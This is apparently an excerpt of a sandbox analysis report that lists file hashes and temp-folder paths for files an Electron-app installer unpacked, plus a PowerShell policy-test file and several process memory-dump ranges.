MD5 88bbc725e7eedf18ef1e54e98f86f696
SHA1 831d6402443fc366758f478e55647a9baa0aa42f
SHA256 95fd54494d992d46e72dad420ceee86e170527b94d77bfaaa2bfc01f83902795
SHA512 92a5c6cfc2d88272bb5144e7ee5c48337f2c42083bc9777506b738e3bcb8f5a2c34af00c4ccc63b24fb158c79f69e7205b398c9e22634dae554410450978a2c4

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\en-GB.pak

MD5 161d0ee49ed171ea8491ceb6c994d176
SHA1 1d85de03cc44eb4f78738006ccef4e5809ff8015
SHA256 77a6578635a0cd3a89ff11116fa819ecb6b2609bf8e9ba92c687711c92c4e143
SHA512 c8600ae02234bbd846fdcdf8dbe270a0aae259a3615805a271117b04a9a2be52180520d855617c7709d694859c28fa63ec2c107ed90a4ecf84194d9717b2d278

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\bn.pak

MD5 696016f43190747d63befa354d76e50b
SHA1 3399e641930b820b627a4e28dea0a79fc457f929
SHA256 1e49980f89360b395a70e844ccd0c43b3a34eab84461b1499e7621f757149e3e
SHA512 3966fcc5988ceeb4dca79c0053fb428e5180029d44704faa4723334c69413a6eacf622e637857c1dcc096e129dd84e2369e4595ea50316cf8eb68696611a8430

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\bg.pak

MD5 d08e8e493f0b3c8ab19070ab05a78af8
SHA1 c5fa430269dc2d32baa6885de2453fa84c36f2fc
SHA256 d223e994ad1aa6e747507187f724cdede8c369d2e8e0def50c4a6c912dba3880
SHA512 4b415fa2ae6ba399674f90ea67e571d90a35fff1ce93df77f20bf692b52c92bfc41e5a3622776e3979b1662fecd2d9665209d5d1d53ece1bff3ed01a28e499d8

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\am.pak

MD5 34b24f035bad74764b7cc57420488180
SHA1 fac3fdba1a94d7676ac4d71447178cfbd1fa4e82
SHA256 9cff5c4af5997b45fb2a384bd73560e56bcb7710149e1a7e3e172d64e6eda025
SHA512 a01da4c45c6295a57248603f01a6b6231c4ce400aa3ec94e4228b26e8cea995c31d52b2008f99d0f17482aad80f1d67725c32e0f37cad6b012b1022ecde998f0

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\af.pak

MD5 94af96b7f60a4cfb9d596cd8927ba37d
SHA1 556833517bc6ad77b5427000f2c3dccad91b92e6
SHA256 716e296c2f663ad90cdde85c5134582fc2305e5ebe10649fc9653bea533500a6
SHA512 6605688a373a358ff1dfbeda1c09dd031e4a63de662555f5304843c31eb3afcedbc8ffa4dae8ddc1483b04ea24cb709ecc639a9902caa68731d8e44d04cdbd83

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\v8_context_snapshot.bin

MD5 936a529299d925f06181035c01c3fc71
SHA1 1795ff36f04aeb830dc47c7648890bc4040eb711
SHA256 7249d4a31a52cdb29031445b9ccbe0ec2ff1b86c947fc16f8a0a96d5bd071898
SHA512 60fc3fa4ecef679bd1041e5c072c97ef907a0f6026aa00616cfdc69e4458cadcd2812ce0871a1aae13a5196357dbc3325589e00084bf8cbbf791db9e077a79e6

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\ml.pak

MD5 9f0422326953a0c48c1db82ca2a9d639
SHA1 2305bc895e9ccc5b9a3d661e891c4f06d8a503ff
SHA256 f2fb440eb0518dc695810fcb854b20b72aa47e5ffc75c803aacf05861d35a94f
SHA512 a899dd975a56a53503b5cbc7448f54423b18bfbd917f73f0871840d6cf6a574bbaac8d735ae8de6a074cd78c43b6640e3e46be1550dcef8f8cfd1971cc1513d6

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\lv.pak

MD5 e4993f39d6fa671658aa3ce037aec60d
SHA1 2db9bfc42b07060f6e256c74a01c348cd6c2ac0a
SHA256 1e6f9a40f4fa1206117063234399bd7c1e7d198cbf6c4ad633e5e18ad0929836
SHA512 4192274330be238a93e370fc3fc8ada444b38fa1464889f0e3d0f6c5e548f7f7de14248937d45f8aa84c043078a69174ac1c9a5894fc9b4ff8f10deef6f77e5e

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\pt-BR.pak

MD5 c3bc628628f8809ec2d18f997db6e540
SHA1 14c6f0215b7895f2648813ad033b59242d058a13
SHA256 6bb17174a3d061afe86cf901cca658793bccc53f7edd1cbde0b58fe90e71a9e8
SHA512 73ca0eaf1f1a250bf50db5d1ae2f3b58c93289703ea85a7bb891463412a63ea8a88fbf19976d9fba637f99cca097fcefda773d2fcf07daf6f5a1d270597703a7

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\pt-PT.pak

MD5 e4565bfa531c9c4344f84dc8be207c93
SHA1 5d1084ad5bff80383129850a853fe1319c23199f
SHA256 fcd194e5caf36be4958c559acbde4f28a957083bf2aceac893f9e5c9e65d8a95
SHA512 531a318e8ef1683abe4bc7b44e7d3a4d6ef907d5e7ddfa1f5cea20414dd33060981afdb8d1f4813b05be90985f10fb892f9060f6c1f2b975984f12acc8cdce6a

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\uk.pak

MD5 b11fcf5670f611e270552a51e8f4000a
SHA1 c28630a621b77df7434fb016f5b1e50d456cf296
SHA256 96f45509b52f046e70f3f61416b93ba8f2f5a0f06d7d849056161300a3ac6e5c
SHA512 a6f357825e59c35f72d740ca23300b3e233be1949dc4c5c5a3a268f4e0194b0be839f95fc125d8527d851971952c09ac233b294002f43911c2599859d935e8c7

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\tr.pak

MD5 1e661df0ee32346b7816e1cec439e9da
SHA1 2bd38e0a4ec62f306aae932d8e448a0911a5a63c
SHA256 6c5dfdfe34c0f6b2b00364dbd7ef3c62fb0d71a163f9254a7b4b3624d66c4ec0
SHA512 ef49c1f329f00e2a9350e7a6e3789c6ea2c84026e541717e4d72ea3723ac29e9be3e0d4a82e36ccfab27365feceef0012c209c53e3b079148140e0f08f55de56

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\th.pak

MD5 33dae3c79e7c1798eada31b70e3f2518
SHA1 c386f4babd6545c915dda9dfd4bcc8cae5ff6c86
SHA256 a88de31d7605a1c3eed2b5008cbf31de368d91fd57a543c995a3c2263144054a
SHA512 a1d033f85ba340a8f6f3da1aaa15bb8b04abc1acca1e9554af04576f512d38e6088c406f3227e03239e741eab68fe3a83a0ee13aff3c51554fa7e41b1d42029d

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\te.pak

MD5 d251d089aa789bccc27a0b473d39e46c
SHA1 283d8fb6b6195b3427144773ffc4691c82e31f0e
SHA256 8dd7d206379445bd9afa4e01ab986c439cf70841d080fca6e152b453e94fcc49
SHA512 27e6f13f6c7937c8121451d70ee90d2a2ce5e519d17e882a86b29a6a78764427022c36b6a99178e9933e01500b55bcbfd0dc79a6f028a046967c2c53f78424fa

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\ta.pak

MD5 088f7313392bd5bd898a984b434cee97
SHA1 bda9d5f5e87055674aecdb609a46a046bb0a6903
SHA256 e2868cbfde36485e8227ec24789a809ef4590f8841e5ee625cee154ba3701e78
SHA512 f8849d13924da2f5e3bb98f2aae19317d3f4260ec8e916ab88a91d6af97c9ba8fab929f91acb3b5575e30e87dda847f1192b6b2dc1d05341ce75a86a4fee8edb

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\sw.pak

MD5 0787972a076c6690e7938758c2a92e24
SHA1 dbf02e5a3ae26acb060b533bb006756c19122bfe
SHA256 eb96ab83e2e08e811928742590178e97454863bc581dd8574d6a644fd3c6615a
SHA512 9f3560a3b648b1a7025cd8a98c39ec7634883aade1ac2c7836fde890cc04bd009aa5c1bca8354ee1259ebcd9482326c51a7d21bdee3caf92984ecbefab35d34c

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\sv.pak

MD5 8132fd35c20f775508f5440b7f3d6871
SHA1 4e50c2b45c69e95f95f34398a7a4babc06420c1a
SHA256 867687296810c4a95a1876edd91ce08e57ff1894c9f22913808fee1d21362589
SHA512 e13ca94f6766a49a9b11a128bad1a5803c3ae9aaa9a8a536995eaf510da071995fa27b087fd3f14422cf21792a54b9527a1fe658947a446a6764b32a86479d3f

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\sr.pak

MD5 b1f52cd111da3b1ea1f31e082f15ba25
SHA1 3f4f13a0d253e8fbcfc1fb93125feed51f03bc56
SHA256 1410f7d93d53642ef9aa8dfd92497c923d71a97e419a6219c7bee7798c3561e1
SHA512 2c0ae8d36c496d570d6e013f859caf655a74047a2a27b79ad0895eba5a46c0895d123d532b8bfa4370ce67caf6b874cb29d751fd025586bfafad0bb800b22144

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\sl.pak

MD5 be05e8eea54a25cd15d807264f8aa284
SHA1 a63dc26044b31fb4e1a35b1f5778150d737ccfce
SHA256 63963e60a45495ff762f02e02fd42c723d7c482a44c07e50473cbf7ccdd73eca
SHA512 4163b3eeb5e55beacc53349cad6899e871d74109a50b28a001e98f0000cf6eb57d4e06f10a70557664f15f4456fbcbb80ac7dbd1174bd19a20975da108ef2dc5

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\sk.pak

MD5 8e5ecfbf0ab9e00401f088489afed0c2
SHA1 a99df2ed2a00ade4cde178f73893b84aaee521cc
SHA256 25e0167d708a004e36e3c344e0209e979d42874122cae03ef2e2c5e110f39364
SHA512 401ea003abfb4a32b52cfab912c2199800f54aabf1321802f973a9925f535d40cff9825832d98ca86eb3af794f64aa408dbbd99e2083f2e9fd0d02ec4debd301

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\ru.pak

MD5 4fb18b712580caa5cdff8c8cbe9e67f3
SHA1 79bdeed0aa9bef9a8396a426e370b4022b09243d
SHA256 bee87b5ef0ab61c05eb3ed4c43ba0900a75a853fdaef2218ffa1b2eaa4d29d21
SHA512 fd91fae4dfded1fcb6cc0e6a6da4caa123c8347d1a9eff33c0d5339aa9854dc07bbb3c84e1880f260eaf932a1a2af9784157d5656b29d661e20961f499b1e5b0

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\ro.pak

MD5 8c922129bfb61fe14fa035d965108823
SHA1 aa8d8dac978053163a303c1f1206480144d4b330
SHA256 06c6486e8a42b447a55bd789bf2bc794354fa4be062139481e4612550f16c755
SHA512 25f9c2b75febfe607cbdd872a82338aecb5f277ed2d3d80fe0ec01289e3361445102392ea23207658ac347a774a7f47bbe19672d49f080cd6aea220da5ac3618

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\pl.pak

MD5 10659a05a7180f54fc46f122ab331052
SHA1 968a0faea6eac3e82f694eb76d24228be58cb734
SHA256 16e9adf63d98e00d0a5433dc9c08253c678d5e3ccdde11783da3c94e98f65e46
SHA512 b815ed62b10bc5abf8bfcaf3a1e42f821bdccb0ebfa6ac15dfb0d1246c71f613fb8c7f2f9f57001377ab5ef700406d0ce3c338fe4a41065d98398341021aad6c

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\nl.pak

MD5 525b638051d9ac36fa759039c17283c4
SHA1 c1922ba3bceae681b90064b60fcb85a7e6c944b1
SHA256 a2335c62cdd4875660e955b0d65d9e995946b1281ed7f34521d3ee01cedd643c
SHA512 680c18b6782f977c87ae0ecae9d1cc0e2590ad75d8146a5ee3e9b1dd9ed1081530f310e871bbd6dccbba42306d8f59778f202691e5690da1859e22d485fc75b5

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\nb.pak

MD5 d1e0429ab9ad3821bb0ad398eb3ea362
SHA1 ee4efa5aa14bb10e70f3542dbe0b256df6c99fcb
SHA256 5844a4a660e41045bf86dca31242e33a6c4726b8dbde15161261446d29ec7add
SHA512 5189abc6844372ed0c115c6ce341387514034dc2c54f068fe6b479d12ee76d5a727653fa0dabb2950eabff6e6f529c17cdd7ae822515d20b74889012d27f7032

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\ms.pak

MD5 c8d605a91b2b66603b379f5557783afe
SHA1 d6f294eb91675182f658158ff9399592935c779a
SHA256 7707f79a2a4aec553e68af87802a0f19d3714a25311fb7b8afdc6ff4a5b6c5ff
SHA512 a9f100dc1fe0a19a0a0a4360fff392af4e07eaed6613ab6dc61548d36afe55e4c9183e6584ca4e15feb477947ee8a79a96775718197129a555319a162281b9c7

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\mr.pak

MD5 b0e1f36587445f28f22777d555683a0f
SHA1 42f7cd3c596c2f52662b86df9d9096bf822a80f3
SHA256 a674db4e60152fc17a32d4b92add129adaebfc02a1a783a12653f984447c535e
SHA512 575fdea827497ceab51df5fc8783f960b87d180f6031f0947525279d224189a6299943df37a014f7bcefc637ee23327fb1ae82eb77c175d63c515b29947ac0d1

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\ur.pak

MD5 7b5fed5150135b728bf8865246f7c8fc
SHA1 214b0f507ff6384b1b305f1718db43023499eeaa
SHA256 a0c752a805da7dd6608ad04625734f4d27cb75b682f51b2dc8ef08350cc7a2cc
SHA512 81fc55db4b0635e09057fd060d9eb72bda5a5fd2d2e1e4284e1b45098b287c609526c766b030dd0eaebc0836a32bcbf6dc0aae94327c103f3f736b5cd051a8a1

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\zh-TW.pak

MD5 ca8bf0d267507545580758c81e9fb2c2
SHA1 9ec7a2e731775bf3224317681847ffc54376702d
SHA256 eb02d499aada4f358c0776c301416de758167ada695503c0e72135ee462fcdfc
SHA512 d5322739253544d519d52aaf8a34fd0fcf3abcc49499e60d320265e85b173f49189d0f95c7ff67a9369400759830141bc342de7fb710cd047e8832070007716f

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\resources\app.asar

MD5 e17391bf3cc98be5554b509c39908fb9
SHA1 8f2e6726c940ce42df95a05c78385c824b4d560a
SHA256 7fbeab871461f743124788a03f048c21991e6f8cd165cf7af5ed87bf11126e3a
SHA512 998750ec0971f5aa7102253b38eb786dc3ba1f5ef9870a34ba7e4366cef37c04c15dca75467b17cfdb0b8c6950f042615ada8f6689d8cf8453460456133e67aa

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\zh-CN.pak

MD5 8af3f2940137687b483ff2f4d9185b98
SHA1 58ce1fcadd8ca27abd11f0614401a12a7e93b11e
SHA256 766f8ac9d4e06437fd3300608ad4d31228576dcaa1e164ccbc4333d56493e9fe
SHA512 fe55fb3d0abab843e4ea1a33d590b3a9e885f6ea8a38cb8f651d090e8c5ea3400efd212502cac500ef26cc5d6b7a4a7cb66e4aee1a4bb13b97f0926ac99b16e0

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\7z-out\locales\vi.pak

MD5 b6174a2dd1e3f557cb99060fc3101063
SHA1 be115f1d2dc8135683a182ab5c09feab74a3c97f
SHA256 b654478c2d28b97d821a75543a0494bc35548749fc3eeb6b33b08b4f5f4fd84c
SHA512 ddbd38e7513f213b3603b1fbf16ad21fa34382cd11e33201cf579c2913a7b6e143a03bf12f11afb281a40c6948da9844b6c9d5ab372d7500184014e98ea74c19

C:\Users\Admin\AppData\Local\Temp\nsu8027.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

memory/5956-1467-0x0000026F377E0000-0x0000026F37802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_que0vy4g.acp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5956-1477-0x0000026F37CE0000-0x0000026F37D30000-memory.dmp

memory/5236-1521-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1523-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1522-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1527-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1529-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1533-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1532-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1531-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1528-0x00000186FFD30000-0x00000186FFD31000-memory.dmp

memory/5236-1530-0x00000186FFD30000-0x00000186FFD31000-memory.dmp